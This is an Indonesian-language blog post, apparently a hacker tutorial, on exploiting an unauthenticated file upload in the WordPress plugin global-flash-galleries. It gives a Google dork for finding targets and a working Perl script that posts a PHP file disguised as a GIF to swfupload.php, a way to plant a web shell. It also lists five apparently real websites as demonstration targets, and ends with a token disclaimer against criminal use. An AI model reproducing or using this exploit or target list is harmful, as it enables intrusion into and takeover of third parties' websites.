selamat siang para jones
kali ini saya akan share tentang file upload
langsung aja ya dibaca tutor nya ;)
Google dork: inurl:/wp-content/plugins/global-flash-galleries/
yang dibutuhkan pertama kali ialah PERL
Download aja PERL nya di situs2 yang menshare tentang download PERL
ini script nya untuk script PERL
# Exploit :
= = = = = = = = =
[Perl]
#! /usr/bin/perl
use LWP;
use HTTP::Request::Common;
my ($url, $file) = @ARGV;
my $ua = LWP::UserAgent->new();
my $req = POST $url,
Content_Type => 'form-data',
Content => [
name => $name,
galleryselect => 1, # Gallery ID (popup.php)
Filedata => [ "$file", "file.php.gif", Content_Type =>
'image/gif' ]
];
my $res = $ua->request( $req );
if( $res->is_success ) {
print $res->content;
} else {
print $res->status_line, "\n";
}
[Perl]
# Exploit demo :
= = = = = = = = =
http://radiostan.fm/wp-content/plugins/global-flash-galleries/swfupload.php
http://izhairstudio.ca/wp-content/plugins/global-flash-galleries/swfupload.php
http://awb.usahidsolo.ac.id/wp-content/plugins/global-flash-galleries/swfupload.php
http://minigolfcourseulles.fr/wp-content/plugins/global-flash-galleries//swfupload.php
http://madiro-hotel.com/wp-content/plugins/global-flash-galleries/swfupload.php
# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# Special Tnx to V1R4N64R ,C4T,HAMIDx9
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #
0 komentar:
Post a Comment
I just a newbie and student, don't using this article for criminal